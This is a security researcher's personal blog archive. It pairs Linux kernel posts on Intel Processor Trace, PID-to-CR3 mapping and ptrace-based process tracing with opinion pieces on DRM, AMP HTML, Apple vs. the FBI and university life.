2017-03-21T21:15:00-04:00

Lately, I've been playing around with Intel Processor Trace (PT); a x86 hardware feature that allows for complete tracing of process control flows. As part of my research, I've been developing my own Linux driver and user program to control PT.

Tracing can be configured using a handful of model specific registers (MSRs) in the Intel CPU. One useful configuration supported by PT is CR3 filtering. For those readers less familiar with x86 architecture, when a user process is executed, the CPU's CR3 register holds the physical address of the process's page table. Since every process has its own page table, each process will also have a CR3 value that is unique from every other currently scheduled process. By configuring PT to use a CR3 filter, tracing can be limited to a single process.

Early versions of my program could only trace already running processes. I would use the GNU debugger to start the target process and trap its first instruction and then I would manually feed its PID into my program as an argument. The Linux driver would then convert the PID into a CR3 by traversing the process's task structure (virt_to_phys(task_struct->mm_struct->pgd)) and use this address to configure PT (IA32_RTIT_CR3_MATCH). Needless to say, having to manually start and trap the target process got very tiring after repeated tracing.

To simplify tracing a process, I wanted my program to take as parameters the file path of an executable and its arguments and automatically start and trace the process. My first attempt roughly followed this pseudo code:

pid = fork();

if (pid == 0) { // Child process

    // Wait for parent to signal that PT is ready
    execvp(target_program, args);

} else {        // Parent process

    enable_cr3_filter(pid);
    enable_pt();
    // Signal child that PT is ready
}

Easy enough, right? I compiled the program, ran my first trace and got... nothing.

execvp and CR3

So what went wrong? It turns out we can demonstrate the problem with a simple test. Consider this simple C program:

// test_1.c
#include <stdio.h>
#include <unistd.h>

void pid_to_cr3() {

    int m_pid = getpid();
    char pid_str[20];
    snprintf(pid_str, 20, "%d", m_pid);

    FILE * chardev = fopen("/dev/pid_to_cr3", "w");
    fputs(pid_str, chardev);
    fclose(chardev);
}

void main() {

    char *argv[] = {"./test_2", NULL};

    int pid = fork();

    if (pid == 0) {      // Child process

        pid_to_cr3();    // printed to dmesg
        execvp(argv[0], argv);
    }
}

In this example, /dev/pid_to_cr3 is a simple Linux character device that processes can write a PID into and it will print the corresponding CR3 value into the kernel log:

// pid_to_cr3.c
static unsigned long pid_to_cr3(int pid) {

    struct task_struct *task;
    struct mm_struct *mm;
    void *cr3_virt;

    task = pid_task(find_vpid(pid), PIDTYPE_PID);

    if ((uintptr_t) task < 1)
        return 0;

    mm = task->mm;

    // mm can be NULL in cases such as kthreads, in which case we want the active_mm
    if (mm == NULL)
        mm = task->active_mm;

    if (mm == NULL)
        return 0;

    cr3_virt = (void *) mm->pgd;
    return virt_to_phys(cr3_virt);
}

After test_1.c passes its PID to /dev/pid_to_cr3, it then uses execvp to overwrite its memory with a new program: test_2.c. This program simply passes its PID to /dev/pid_to_cr3 as well:

#include <stdio.h>
#include <unistd.h>

void pid_to_cr3() {

    int m_pid = getpid();
    char pid_str[20];
    snprintf(pid_str, 20, "%d", m_pid);

    FILE * chardev = fopen("/dev/pid_to_cr3", "w");
    fputs(pid_str, chardev);
    fclose(chardev);
}

void main() {

    pid_to_cr3();    // printed to dmesg
}

If we compile these source files and execute test_1, we expect that the PID before and after executing execvp will be the same because execvp causes the kernel to overwrite the caller's own memory. But what happens to the CR3 value? As it turns out:

[ 1757.437572] PID 17319 = CR3 18759503872
[ 1757.438414] PID 17319 = CR3 18826612736

Rather than rewriting the existing caller's page table when execvp is called, the Linux kernel actually allocates and populates an entirely new page table! Since our original PT program was getting the CR3 before the execvp, our trace wasn't including the target program's execution.

ptrace

So how do we get the CR3 value after execvp is called by the child? We can't simply have the parent signal the child, like in the first attempt, because any code we give to the child process will be overwritten when execvp is called. The solution instead lies in an OS feature known as ptrace. Using ptrace, we can have the child process attach itself to the parent process for debugging. When execvp is completed, the OS will pause the child and signal the parent. The parent can catch this signal using waitpid(), do whatever it needs to do, and then resume the child. The code looks something like this:

pid = fork()

if (pid == 0) { // Child process

    ptrace(PTRACE_TRACEME, 0, NULL, NULL);
    execvp(args[0], args);

} else {        // Parent process

    waitpid(pid, NULL, 0); // Wait for child to complete execvp()

    enable_cr3_filter(pid);
    enable_pt();

    ptrace(PTRACE_DETACH, pid, 0, 0); // Resume child

}

Note that this code detaches the parent from the child once the child has been paused. This causes the child to resume normal execution. If we wanted to continue monitoring the child (for example, to detect fork() or clone()), we could do so.

Making the above modification allows the parent to capture the correct CR3 value and get a complete PT trace.

Of Fancy Bears and Men: Attribution in Cybersecurity

2017-03-09T22:30:00-05:00

I wrote a guest blog post for Georgia Tech's Internet Governance Project (IGP) on the topic of attack attribution. You can read the post here: http://www.internetgovernance.org/2017/03/09/of-fancy-bears-and-men-attribution-in-cybersecurity/

Getting the CR3 value for a PID in Linux

2017-01-30T20:30:00-05:00

Writing low level code can be difficult due to the lack of examples on the internet. The answer is generally sitting somewhere in a 3,000 page manual where only the most dedicated programmers will find it.

Last week I had such an experience. Currently my research involves a lot of x86 specific programming and virtual machine introspection (VMI). To test one of the proof-of-concept hypervisors I'm working on, I needed a way to quickly convert Linux PID values into the corresponding value that gets loaded into the CR3 register when that process is executing on the CPU. For those who are unfamiliar with the x86 CPU architecture, I recommend reading this page on Linux x86 page table management. The short story is when a process is executed on an x86 CPU, the CR3 register is loaded with the physical address of that process's page global directory (PGD). This is necessary so the CPU can perform translations from virtual memory address to physical memory addresses. Since every process needs its own PGD, the value in the CR3 register will be unique for each scheduled process in the system. This is very convenient for VMI because it means we don't need to constantly scan the guest kernel's memory to keep track of which process is being executed. Instead, we can just monitor writes to the CR3 register.

However, just tracking changes to the CR3 register doesn't give us much insight into what the guest kernel is doing. This is commonly referred to as the semantic gap problem. In order to cross this gap, we need to map the PID values of the processes we're interested in to their corresponding CR3 values. The following Linux kernel module code snippet does just that:

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/sched.h>
#include <linux/pid.h>
#include <asm/io.h>

unsigned long pid_to_cr3(int pid)
{
    struct task_struct *task;
    struct mm_struct *mm;
    void *cr3_virt;
    unsigned long cr3_phys;

    task = pid_task(find_vpid(pid), PIDTYPE_PID);

    if (task == NULL)
        return 0; // pid has no task_struct

    mm = task->mm;

    // mm can be NULL in some rare cases (e.g. kthreads)
    // when this happens, we should check active_mm
    if (mm == NULL) {
        mm = task->active_mm;
    }

    if (mm == NULL)
        return 0; // this shouldn't happen, but just in case

    cr3_virt = (void *) mm->pgd;
    cr3_phys = virt_to_phys(cr3_virt);

    return cr3_phys;
}

It should be noted that while the CR3 register is useful for tracking which process is being executed, it cannot track which thread is executing because threads share memory and therefore will have the same PGD and CR3 value. Keeping track of the scheduling of threads via introspection is a more complicated task and is a topic for another time.

For simplicity I implemented the conversion code as a Linux kernel module. If you're interested in how to do this conversion using pure introspection on an unmodified kernel, you should checkout libVMI's code.

Site Redesign

2017-01-24T19:20:00-05:00

HTML5Up

When I originally registered the domain carteryagemann.com I imagined it would be a single static page summarizing my professional career; an eye catch for recruiters and peers searching my name on the internet. I wanted a place for bragging that I would have complete control over and not be restricted by the cookie-cutter molds set by social networking sites. A few months later I was asked to write blog articles for Syracuse University's engineering college and suddenly my website was no longer a sole page. As much as I liked my HTML5Up design, I needed new templates. I also have to admit that the JavaScript my site originally used was slow at times.

AMP HTML

I always liked the idea of fast and efficient web pages, especially when those web pages are being served at my expense. I wanted to stay with static pages for two main reasons. First, static pages are cheaper and easier to host and cache. Second, static pages pose little attack surface. The last thing I wanted as a security professional was for a site with my name on it to get compromised because I only look at it twice a year.

I was browsing around for platforms to build my new site on when I heard about this thing Google was working on called AMP HTML. What drew me in was their promise of a fast user experience and a specification designed for being cached. Google was going to cache and prioritize search results for AMP HTML pages and even social networks like Twitter announced plans to implement AMP HTML caching servers. All this meant free bandwidth and geographically distributed caching for my humble site. Perfect.

Sadly, about a year after I reworked my entire site to run on AMP HTML (I had even visually designed it based on Material Design), I realized my decision was not the best. More accurately, my work in security brought me into contact with more privacy-minded people and over time I came to adopt their mindset. I stopped seeing AMP HTML as an open source project and became hung up on the company that sat behind it. A company that over the years has pushed a narrative in cyberspace aimed at destroying privacy with promises of convenience while hiding its true goal of making money by knowing as much about people as legally (not ethically) possible. As the now famous saying goes:

If you're not paying for it; you're the product.

There were also three other reasons for my dissatisfaction with AMP HTML:

Mandatory JavaScript

As someone who values security and privacy, I try my best to make websites that are functional even when the user disables active content (JavaScript, Flash, etc.). If a site wants to use JavaScript to make some parts prettier (e.g. syntax highlighting code) or save bandwidth (e.g. AJAX), that's fine. On the other hand, I find it very rude and unethical when a site won't even display a single image or line of text until the user executes JavaScript from 30+ sources (news sites are particularly notorious for this). JavaScript is code, code can be malicious or invasive (e.g. JavaScript exploit kits for installing ransomware), and just like how I wouldn't hand someone I just met a self-signed Windows executable and ask them to run it, a user shouldn't be forced to execute JavaScript upfront just to see what the site is about. This is even more true when that JavaScript is heavily compressed and obfuscated.

In-line CSS

In order for AMP pages to be easily cached, the specification requires that all CSS be embedded directly in the HTML. This quickly becomes a problem when you have multiple web pages and you want to adjust your site's theme. Writing all the pages by hand turned out to be a major mistake that lead to inconsistent formatting and unnecessary work.

Public Opinion

People, especially those with technical background, are becoming more conscious of the importance of privacy and security and more weary of the power wielded by major tech companies. Even the tech enthusiasts that buy into the mantra of "nothing to hide" have become more cautious of walled gardens that try to lock the user in. The result is negativity towards the AMP HTML platform.

Additionally, as the AMP HTML specification evolves, people both on the technical and nontechnical sides are becoming confused.

In response to all these points, I decided it was time to move to a different platform for managing my website.

Pelican

For my new site I still wanted static pages for their cheap hosting, easy caching, and security, but I also wanted a way to be able to write my content in a high level language and have a program automate compilation and deployment. This isn't a new idea by any stretch, so I knew there had to be good tools readily available. After looking at what the blogs I read were using and hearing a few recommendations, I decided to go with Pelican. For those of you who want to statically host blogs, I highly recommend it. The learning curve is manageable and the tools are very comfortable for technical people who already prefer command lines. Pages and articles can be written in Markdown, which should be familiar to anyone who stores code in git repositories. There are also plenty of free and publicly available themes, including the one I'm using for the site right now. I'll stop there before I start to sound like a salesman.

However, while I'm on the topic of plugging software I like, I will also give a quick mention to linkchecker, which I used to find and fix a few links in my past articles to external sites that no longer exist.

So there you have it. The site now runs on Pelican, I like it very much, and hopefully the considerations I listed here will give you ideas to think about.

The Problem with DRM

2016-10-22T22:30:00-04:00

Preamble

The topic of digital rights management (DRM) systems is a controversial one among those affected by it. Some readers are going to jump to conclusions without properly reading what I want to write on the matter and there's nothing I can do about that. To those with minds open enough to read this entire blog post honestly, I promise to present you with a perspective that, although not novel to everyone, isn't a rehash of the most common arguments made on the topic. What I will argue is a stance based on my technical understanding of computer systems as an information security researchers, which I believe is a perspective many aren't exposed to. If by chance you happen to be such a researcher, you probably won't find this post particularly interesting. For everyone else I hope to present a robust formulation of the problem that is insightful while still being easy to understand.

Additionally, as is necessary when discussing controversial topics, I must state that the contents of this post are my personal opinions and mine alone.

Motivation

DRM has become an active topic of debate in multiple communities due to recent changes in how technology allows us to access and experience digital content; such as movies, shows, games, and music. With the decline in users buying and storing their own digital content in favor of services (Netflix, Hulu, Steam, Spotify, etc.) that offer to stream it over the internet on-demand, DRM touches more lives now than ever before.

For users of these services the benefits of not having to think about storage and having cheap and immediate access to the latest content are very appealing. Try to access content from even a year ago however and the trade-off becomes apparent. These services may be cheaper, but they also don't guarantee lifetime access as licenses change and budgets require money saving cuts. As some users have been frustrated to realize, there's a difference between paying to access and paying to own. Adding to the frustration is the inability to access content on some services when an internet connection is slow or unavailable.

The idea of using computers to illegally share digital content is not new to digital content services, but these services do give the act new motivation. Where users might have considered illegal sharing to avoid the cost of buying the digital content, now users seek to avoid subscription fees, ensure lifetime availability, and counteract limited internet connectivity. This motivates license holders to require services to implement DRM; systems designed to make it difficult for a user to permanently store and illegally share on-demand digital content.

However, I fear that many license holders demand these systems without actually realizing their limitations and unintended consequences. That is why in this blog post I would like to take the time to formulate the problem of using DRM to protect against illegal storing and sharing from the perspective of an information security researcher. Frankly, I think DRM is a losing battle and I want to present the reader with a robust formulation to justify why I see it that way.

Cat and Mouse

The first thing we have to understand is that DRM in practice cannot completely prevent illegal storage and sharing. Simply put, you can't show someone something without showing it to them and once they've seen it, you can't prevent them from having some ability to reproduce it. Even if you had a magic wand that could somehow wipe their memory, who's going to want what you have to share if they won't remember it? DRM cannot be perfect.

However, this is not to claim that DRM cannot be effective. Specifically, we can think of using DRM as making a trade-off between multiple factors. Namely, the cost of implementing the DRM and the inconvenience the DRM presents the benign user verses the time and skill required for the adversarial user to bypass it. In other words, an effective DRM system is one that is cheap to implement, produces few enough side effects that the benign user is still willing to pay for the service, and requires the adversarial user to commit a lot of time and skill to bypass.

So keep the good, throw out the bad, and we're done, right? Not so fast. We could do just that if the factors had no relationship to each other, if they were independent, but they aren't. Anything you do to make the adversarial user's task harder is going to increase the cost of implementation and inconvenience the benign user. Don't believe me? Implementing software DRM restricts the benign user to only systems that can run that software and allows the adversarial user to bypass the DRM using her own software. Operating system DRM now requires the adversarial user to implement their own operating system software, but also now restricts which operating systems the benign user can use. Hardware DRM raises the bar further by requiring the adversarial user to devise a hardware level bypass, but now the benign user can only use certain hardware. Hopefully you can see how this is a game of cat and mouse. The harder you make it for an adversarial user to bypass the DRM, the more restrictive the benign user's experience becomes. Similarly, as you increase the skill the adversarial user needs to bypass the DRM, you also raise the skill the programmer implementing the DRM needs to design it, which raises the cost. Basically, as you make the DRM better at thwarting the adversarial user, you also make the service more expensive and less appealing to the benign user.

Hopefully you now see why balancing the factors I've pointed out is not trivial. The next question is how hard is it to find this optimal balance. If it's easy we can just find it and we're done. We'd then know what degree of DRM to implement.

Sadly, I'm going to argue that it's not easy to find. In fact, the reason why finding it is difficult is because it's subjective and constantly changing! Notice that all the factors I defined are very soft. User experience is hard to measure. The user's tolerance for being inconvenienced is hard to measure. Even skill and cost are hard to measure in this context. Not only that, but these factors change over the course of public discussion. Opinions simply change. What all this means for us is that it's difficult to measure the factors we're interested in, it's difficult to determine when we've struck an optimal balance, and even if we strike a balance it might not stay balanced for very long. In other words, our best efforts will be no better than a random guess. Sure we might get lucky, but why pay to play in the first place?

Two Extra Cents

In general I find it interesting to argue that people are blinded by an unjustified pressure to achieve progress. That's not to claim that we never take steps in the right direction, but rather that when the path becomes too foggy we tend to start taking random steps and then spend a lot of effort convincing ourselves that the steps somehow weren't random. It's worth pondering if a solution has fallen into this pattern because the result when it does is a lot of effort spent on something that doesn't actually solve the intended problem.

Demystifying the Master’s Thesis — Is it right for you?

2016-04-21T22:30:00-04:00

Originally written for the Syracuse University College of Engineering blog.

A few weeks ago I successfully defended my master’s thesis. At 55 pages long, it summarizes my research findings from two years spent in Professor Kevin Du’s lab studying the security of the Android operating system. With its acceptance, I receive the last six credits needed to complete my degree. It was a long and intense process, and honestly, there are easier ways to earn credits.

Depending on your program, a thesis isn’t always a requirement. Many students opt for their program’s non-thesis track. So, how do you know if completing a thesis is right for you?

Let’s start by defining it. A master’s thesis is a cumulative work summarizing a student’s independent research on a specific topic related to their major. In my case, that topic was the security and privacy of Android intent inter-process communication. Translation—how do applications in an Android device share messages between one another and what features can we add to protect their “conversation?”

Thesis work is overseen by a research advisor, a professor who provides feedback and direction. Ultimately, it is the student’s responsibility to find a topic and perform the study on their own. Depending on the field of research, it will generally take a student one or two years to finish writing their master’s thesis. This makes prior planning essential to ensure that the thesis will be completed in time for graduation.

Once the thesis is complete and the advisor is satisfied with the work, the student has to defend it in front of a committee of four faculty members. The defense consists of a 20-minute presentation followed by questions. It takes about an hour. Once complete, the members convene privately to decide the outcome of the defense. A thesis can either be accepted, accepted with minor revision, accepted with major revision, or rejected. Thankfully, rejections are rare when the student follows their advisor’s guidance.

Once the thesis is accepted and any revisions are made, it’s sent off for publication and will usually be printed and placed in the university’s library. Most departments give their thesis students three to six elective credits depending on how much time went into creating the thesis.

So that’s all the gritty detail of how a master’s thesis works, but why do one in the first place? If your objective is to get your degree and go directly into industry as efficiently as possible, a thesis probably isn’t for you. It’s much safer to take classes to get those elective credits and most employers value time spent in internships more. The student who should consider a thesis is one who is interested in gaining exposure to research. I could write for great lengths about the difference between being an engineer and being a researcher, but suffice to say, the open-endedness makes researching a very different ballgame. A master’s thesis is a great opportunity to test the waters and see if that’s the kind of career you want to pursue. If you go for it, it opens the door to pursue a doctorate. If not, the door to industry will certainly be open to someone with your qualifications and research.

As with anything, it’s important to make the choice that is right for you. For me, the extra effort was well worth it. This fall I’ll be a doctorate student at Georgia Tech—a goal I am very proud to achieve. My experience completing my thesis at Syracuse University’s College of Engineering and Computer Science and in Professor Du’s lab has given me the confidence to take another leap into computer science research.

About The Author

Carter Yagemann ’15 is a master’s student studying computer science in Syracuse University’s College of Engineering and Computer Science. A research assistant in Professor Kevin Du‘s Android security lab, his interests include mobile security and security education. He explores problems such as how to ensure security and privacy in Android inter-component communication. Yagemann is a student member of ACM and IEEE and competes in cybersecurity competitions with the Information Security Club in Syracuse University’s School of Information Studies (iSchool).

Apple’s Balancing Act—Yesterday, Today, and Tomorrow

2016-04-01T22:30:00-04:00

Originally written for the Syracuse University College of Engineering blog.

A few months ago I read Splinternet by Scott Malcomson. It recounts the early days of the internet and personal computing. One section in particular caught my attention—a quote taken from an abandoned Apple ad campaign:

"There are monster computers lurking in big business and big government that know everything from what motels you’ve stayed at to how much money you have in the bank. But at Apple we’re trying to balance the scales by giving individuals the kind of computer power once reserved for corporations."

This quote is from 1984, and yet it could just as easily be mistaken for something said in 2016 given today’s controversies. I find it provocative for two reasons.

First, three decades later the issues raised in this marketing pitch are still relevant. Today, we struggle to decide how to handle technology that knows our very location, companies that track our browsing behavior via web cookies, and governments that make lethal decisions based on metadata. On one hand, it’s frustrating to see how little progress we’ve made in solving issues like these, but on the other it’s comforting to know that problems like these aren’t new and we’ve survived to this point in spite of them. I’m optimistic that as these issues grow to affect our lives in more significant ways, we’ll accelerate our efforts to resolve them.

Second, look at how much Apple has changed in three decades. Look at how they’ve gone from being the underdog, liberating the masses from the chains of the IBM mainframes only to become a massive conglomerate themselves. Modern Apple has appealing products for sure, but make no mistake that what they offer is a closed ecosystem where the customer is expected to run Apple software on top of Apple hardware. In the pursuit of perfecting the user experience, Apple has created a walled garden that takes control of their products away from the consumer. This is a stark contrast to the Apple that once made the analogy of the personal computer being a bicycle for the mind.

All that said, perhaps the Apple of tomorrow will strike a new balance between these two Apples I’ve mentioned. We’ve seen in recent months Apple’s commitment to resisting the FBI’s request for aid in unlocking encrypted iPhones. We might even see future iterations of the smartphone implement new security features that even Apple won’t be able to bypass. Only time will tell how the second act of this ongoing story will play out, but I’m excited to watch it develop.

About The Author

Apple vs. the FBI

2016-02-22T22:30:00-05:00

Originally written for the Syracuse University College of Engineering blog.

In the wake of the tragic shooting in San Bernardino, many questions remain and people want answers. It seemed like a breakthrough in the investigation was imminent when the FBI got their hands on one of the shooters’ iPhone, only to be thwarted by the discovery that the device was encrypted and password protected. Ten wrong guesses and the device will wipe itself clean including all the precious data within.

In light of the situation, a judge officially ordered Apple to aid the FBI in unlocking the iPhone. However, Apple has announced that they refuse to comply. Not only that, but Google has also announced that they support Apple’s decision to challenge the judge’s ruling. Why are two major tech companies reluctant to aid in an investigation? The problem has nothing to do with the technology, but rather the societal consequences such aid would bring.

In order for Apple to unlock the shooter’s device, they would have to circumvent the security mechanisms of their own device. This same technique could then be applied to any iPhone in the world. If Apple created such a capability and put it to use in this case, who’s to say they would never use it again? Allowing for such a power to exist would create a precedent which would undermine their customer’s trust in all of Apple’s products. And this distrust could radiate outwards to other tech companies like Google and Microsoft who could likewise do the same.

But the consequences wouldn’t only be to Apple’s profit margin. Encryption levels the playing field between the mighty and the weak. The same encryption that is thwarting the FBI’s investigation is simultaneously allowing citizens who live under oppressive regimes to circumvent country-wide censorship while avoiding unjust prosecution. Betray these users’ trust with this new precedent, take away their means of broadcasting their voice, and the whole world becomes a darker place.

The root of this problem is not one we are unfamiliar with. Time and time again we are presented with the question of the benefits of taking something away from everyone in order to prevent a few from abusing it. The answer is dependent on the details, and in this case I side with Apple in saying that they should not comply with this order. Compliance would not only hurt American citizens and American companies, it would hurt every citizen of every country. We cannot allow tragedy to drive us towards oppression. We must maintain transparency for the strong and encryption for the weak.

SU Senior Carter Yagemann’s Summer of Android

2016-02-22T22:30:00-05:00

Originally written for the Syracuse University College of Engineering blog.

This summer, Carter Yagemann, a rising senior in the Computer Science program from Jupiter, Florida, spent his summer crawling the Android operating system as part of the Department of Electrical Engineering and Computer Science’s Research Experience for Undergraduates (REU) program. Carter investigated Android security using “an intent firewall” to protect user’s information on smartphones and tablets. We caught up with him following his final presentation of his research to a room of faculty and students at Syracuse University.

How did you learn about the REU program?

I was actually a student in one of Professor Du‘s classes and I had been doing internships in the private sector. I started as a web developer for Frontier Communications and then I worked for JPMorgan Chase in some of their security areas. I wanted to gain as much exposure as I could, so I was interested in getting into research. I approached Professor Du and he gave me an offer to do research under him.

What has this experience been like?

It’s been a lot of fun. It’s been nice to pursue what I’m interested in. There’s a lot less red tape and hurdles when you’re doing research versus in the private sector where there is a lot of regulation and accountability. It was really fun, really educational. I get to be with my peers, people more my age. I can mostly do what I want.

One of the things that is very different with research is that it’s very open ended. You don’t really know what’s going to get traction and what’s going to turn out to be impossible. It’s very free flowing and very flexible. The professors give you some ideas of where to start and you go from there to see if it works or not.

Professor Du was definitely interested in the intent firewall, but most of my research is my own work. I made all of the documentation and the website. I’m the one who crawled all the source code. He was the one who gave me the idea and I took off with it.

Why did you choose to come to Syracuse University?

I was choosing between here and Drexel University and I wasn’t sure that I wanted to be in a big city like Philadelphia. I picked Syracuse because there’s a nice atmosphere here. It’s a condensed campus, and there’s a lot going on. It’s a nice place to be.

What else are you involved in at SU?

I like everything about programming, so I do some hack-a-thons at the Student Sandbox at the Tech Garden in Downtown Syracuse. I have a few friends from the iSchool who often get together to do little things. Freshman year we created a platform called BeerText. The idea was you could text the name of a beer to a certain number and it would send you back a text with a description of the beer. It was really cool. It went viral on Twitter and Reddit. We got 35,000 users in 48 hours.

What do you plan to do with your degree in Computer Science after you graduate?

I definitely want to continue to pursue cybersecurity. Right now I am looking in multiple places. I’m looking at what’s going on out in Silicon Valley and what’s going on with the government.

I am also interested in being an entrepreneur. I have started writing some applications and I have pushed some out to the Google Play Store. I’m kind of a one-man app dev company. I’m definitely interested in getting out there on my own or with friends and talented people. On the other hand, large companies tend to have the resources to be able to do some pretty interesting things.

I just want to go where the interesting work is – something I haven’t seen before. I’m really open. Part of the point of this research was to try to find where I’m happiest.

About the Electrical Engineering and Computer Science REU

The Department of Electrical Engineering and Computer Science hosted its annual Research Experience for Undergraduates (REU) program this summer. It culminated with a half-day of presentations in July in which seven REU students from four different universities, including SU, Cornell, SUNY Fredonia, and the University of Illinois at Urbana-Champlain, completed research on a range of topics. The predominant theme was the development and security of the Android operating system.

Over the course of the summer, students worked with an advisor to select a topic that interested them and advanced the College’s research, then immersed themselves in their chosen subjects. The experience is educational for the students and the advisors alike.

“There are expectations that we are researching and getting something out of this experience. The first thing we are asked is what we want to work on, then our advisor helps us develop research questions from that,” describes Jonathan Secora, a computer science major at SU who focused on animations on the Android platform this summer.

Kevin Du, Professor of Computer Science, advised the students that focused on Android devices including:

Gabrielle George, “A Drinking the From the Fire Hydrant Approach to Learning Computer Science”
Jonathan Secora, “Animation and Application in Android”
Curtis Robinson, “A Short Survey of Android”
Jason Davison, “Communication Problems with the Android System”
Carter Yagemann, “Intent Firewall – Android Security via Intent Filtering”
Fred Schlereth, Associate Research Professor of Electrical Engineering, advised Tom McLeod as he examined, “Trapping of Molecules Inside Non-Ideal Nanoscale Channels.”

Current Computer Science Ph. D student, Paul Rattazi, advised Wesley Brooks at AFRL on “Self-Protecting Apps: Helping Developers Protect Your Sensitive Data.”

How Orange Helps You Sleep At Night

2016-02-04T22:30:00-05:00

Originally written for the Syracuse University College of Engineering blog.

Everyone at Syracuse University knows that orange is the very best college color, but who knew it could also help you sleep? Research conducted in recent years has shown that sleep problems are on the rise and one theory gaining momentum points to our electronics as the cause. Studies find that the abundance of blue light produced by our smartphones, tablets, and computer screens has a tangible impact on the chemistry in our bodies that regulates when to wake up and when to go to sleep. This isn’t a problem during the day when the sun naturally produces its own blue light, but staring at our own personal mini sun before bed can make falling asleep much more difficult. So what can we do about it? We could restrict ourselves from staring at screens an hour before bedtime, but the world is a busy place and our nighttime reading isn't always ink on paper. Instead, programmers are experimenting with software that reduces the level of blue light our screens produce after sunset. As the sun goes down, the screen shifts from a bluish glow to an orange tint and then back to blue with the following sunrise—promising a better night’s sleep for those of us that are unable (or unwilling) to give up our screens at night, This software is already publicly available for computers thanks to groups like f.lux, but availability on mobile devices is limited. Luckily, the big companies have taken notice and are taking action. In an upcoming version of iOS for iPhones and iPads, Apple plans to introduce Night Shift. Flip it on and it'll automatically determine when the sun sets and rises in your area and adjust the screen's color accordingly. Just another reason to GO ORANGE.

About The Author

Understanding Dell’s Root Certificate Problem

2015-11-30T22:30:00-05:00

Originally written for the Syracuse University College of Engineering blog.

A recent discovery in the security community has researchers concerned about Dell devices. Some of these devices have been found to contain something known as a self signed root certificate. Installed by the manufacturer for advertising purposes, these certificates pose a risk to users. This is not the first time this has happened, there was an early case involving Lenovo devices known as Superfish. In this article I will try to explain the problem in an approachable manner as well as point readers towards actions they can take to protect themselves. What are these self signed root certificates the security experts talk about and why are they dangerous? Understanding the problem requires understanding some of the characteristics of something known as the public key infrastructure. PKI is complex in practice, but we can use a simplified model to understand the problem at hand. All we need to know is that there are keys and certificates. By using a key, one can create certificates. If we trust the party who holds a particular key, then we can trust the certificates made from that key. Trust, in this case implies two fundamental trusts. First, that the party that holds the key will keep that key secret. Second, that party will only make certificates for other trustworthy parties. This is the network of trust upon which we perform our sensitive internet tasks such as banking, shopping, and communicating. The problem with the Dell root certificate and Superfish is that the manufacturer has created a "trusted" key which sits on every user's device. The same key. Steal this key from any one device and now that thief can create certificates that will be trusted by all devices. Google, Facebook, Bank of America, Amazon, all of these parties can be impersonated by creating new certificates. Exposing users to such a risk is a severe oversight. Thankfully, the concerns of the security community have been heard and users can now take actions to remove these self signed root certificates. If you use a Dell or Lenovo device, I encourage you to consult your manufacturer's website for more details:

About The Author

Students Compete in RIT Cybersecurity Competition

2015-11-11T22:30:00-05:00

Originally written for the Syracuse University College of Engineering blog.

Last weekend, I had the opportunity to compete in the first-ever Collegiate Pentesting Competition along with five other members from the iSchool's Information Security Club. Hosted by RIT, this competition places competing university teams in the role of security consulting companies contracted to assess the strength of a corporate network. This competition stresses technical and soft skills. Competitors must leverage their technical abilities to find vulnerabilities, as well as document and present their findings to the nontechnical executive board of the corporation. I am excited to announce that out of the nine university teams that competed from across the northeast, Syracuse University took third place! The Collegiate Pentesting Competition distinguishes itself from other cybersecurity competitions by placing a heavy emphasis on the business side of running a security company. Traditionally, security competitions fall into two categories: purely defensive or purely offensive. Purely defensive competitions, such as the Collegiate Cyber Defense Competition, restrict competitors to solely defending a network while a professional team of hackers tries to exploit vulnerabilities to gain access. This type of competition forbids any offensive actions on the part of the competing students. Conversely, purely offensive competitions, such as Capture The Flag events, present competitors with tasks that must be completed by breaking into vulnerable computer systems. Since the sole objective of these competitions is to recover the “flags,” competitors are encouraged to use any offensive tactics possible with complete disregard for collateral damage. In these competitions, the systems and networks often get destroyed as teams race to complete the given tasks. The Collegiate Pentesting Competition is a hybrid between offense and defense. Teams still use offensive techniques to detect and exploit vulnerable systems, but they must do so in a way which does not damage the systems or hinder the company's ability to do business. This requires the teams to be surgical in their methodology rather than simply “smashing and grabbing.” Overall, I highly enjoyed this competition. The level of realism and professionalism it entailed made competing a very educational experience. I look forward to seeing the Information Security Club compete next year.

About The Author

Android for Your Laptop

2015-11-03T22:30:00-05:00

Originally written for the Syracuse University College of Engineering blog.

Google recently announced plans to merge features from Chrome OS into Android to make the operating system suitable for use with laptops. This means that in the future, we can anticipate Android working across phones, tablets, and laptops. This is a very bold vision , but it's one that was bound to happen and one that all Android users should be excited for. Up to this point, Chrome OS has been Google's dedicated operating system for their lineup of Chromebook computers. While Chrome OS offers unique features in terms of user experience and security at a price point that beats most other laptops on the market, Google's substantially different approach to designing laptops has made the Chromebook a relatively niche device. In the years it has existed, it has never reached the point of being a real competitor in the Windows-dominated laptop market. Contrast this with Android, which dominates the smartphone market at over 80 percent market share, and the reasoning behind this merging of the two operating systems becomes clear. If Google can successfully take their winning mobile user experience and port it to laptops, they'll have a formula for a laptop that stands toe-to-toe with Windows and OS X. I think that this is going to be the Google operating system to give Microsoft and Apple a run for their money. Users should be excited for this move as well. The average user now owns more devices than ever before and they want a consistent experience regardless of if they're using a phone, tablet, laptop, or desktop. Google does an excellent job of making the interaction between the user and the device clean, efficient, and friendly, and soon we'll get these same benefits for the laptop. However, there are a handful of design challenges that Google will have to overcome if they want Android for the laptop to be a success and not just another niche product like Chrome OS. For starters, laptops are dominantly used for content creation where mobile devices are mostly for consuming. Laptops are like the working man's pickup truck. Users have different demands for laptops than mobile devices. If Android is to succeed in the laptop environment, a greater emphasis will have to be placed on productivity. This means efficient switching between applications, strong support for keyboards, and plug-and-play functionality for external storage and additional peripherals. These are things only supported to a limited degree in current Android. Screen size also becomes an issue for Android on laptops. Android's current interfaces are designed for relatively small screens—under 10 inches in size. Now that Google wants Android to run on laptops and desktops, they'll have to redesign the look and feel for screen sizes in excess of 16 inches. It may only be a few extra inches, but this makes a huge difference if you don't want the screen to appear barren. For the average user who already uses Android on their mobile devices, I think the transition to Android for laptops will be pretty smooth. Android already has the email clients, web browsers, and office applications these users need for their everyday work. For the "power user" however, I think the new operating system will be a harder sell. These users manage corporate infrastructures, develop software, automate systems, deploy virtual machines, and regularly perform computing intensive tasks. For them, unfortunately, the tools they need simply don't exist on Android yet. I've anticipated Android moving to laptops and desktops for some time now and I hope others share my excitement over this recent announcement. There's a lot of work to be done, but I think that if Google can pull this off, we'll end up with something very special and unique.

About The Author

